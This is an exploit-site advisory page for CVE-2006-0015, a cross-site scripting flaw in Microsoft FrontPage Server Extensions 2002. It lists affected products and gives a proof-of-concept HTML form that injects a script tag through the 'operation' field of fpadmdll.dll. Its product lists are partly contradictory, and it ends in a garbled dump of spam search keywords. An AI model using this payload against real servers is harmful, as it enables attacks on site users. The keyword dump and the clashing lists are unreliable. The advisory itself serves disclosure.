exploits , vulnerabilities , articles , Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability
| Title |
Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability |
| Published |
2006-04-11-12:00AM |
| Updated |
2006-04-13-06:07PM |
| Class |
Input Validation Error |
| CVE |
CVE-2006-0015 |
| Remote |
Yes |
| Local |
No |
| Credit |
Esteban Mart?nez Fay?? is credited with the discovery of this vulnerability. |
| Vulnerable |
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition 64bit SP1
Microsoft Windows Server 2003 Enterprise Edition 64bit
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition 64bit SP1
Microsoft Windows Server 2003 Datacenter Edition 64bit
Microsoft SharePoint Team Services 2002
Microsoft Office XP SP1
Microsoft FrontPage Server Extensions 2002 |
| Not Vulnerable |
Microsoft Windows SharePoint Services
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft FrontPage Server Extensions 2000
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft FrontPage 2002
Microsoft Office XP
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 98
-
Microsoft Windows 98SE
-
Microsoft Windows NT Workstation 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP2
-
Microsoft Windows NT Workstation 4.0 SP1
-
Microsoft Windows NT Workstation 4.0
-
Microsoft Windows XP Home
-
Microsoft Windows XP Professional
|
| Code |
This issue can be exploited through a web client.
An example HTML form demonstrating this issue is availble:
<form action=http://www.example.com/_vti_bin/_vti_adm/fpadmdll.dll method="POST"> <input type="hidden" name="operation" value="--><script>alert()</script>"> <input type="hidden" name="action" value="none"> <input type="hidden" name="port" value="/LM/W3SVC/1:"> <input type="submit" name="page" value="healthrp.htm"> </form>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Mon, 07 Dec 2009 21:22:03 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
1111 www. . WWW.DESIMA 200 /compo indian sex ...t/comp hotsexx Crack Data quadcomm advanced g ph proxy f funformobl 016.qsnook veronica z indian sex modling g a b y .. OEAoeuea phpbb 2001 www.3d8458 www pinc remote roo com_phpsho Ayeshataki news.ltdts free 3d ga wwe sex wwwsexyvid mambots/co news for c nude girls chsh www yoo opensens dal Doctorsex Kerala Nak www.bjxwzj www.cctv61 php-nuke 2 /viewtopic for www.kl sexywomenp \\\'A ets order MS03-039 indin idol LENKA SE Sea woman news for c
|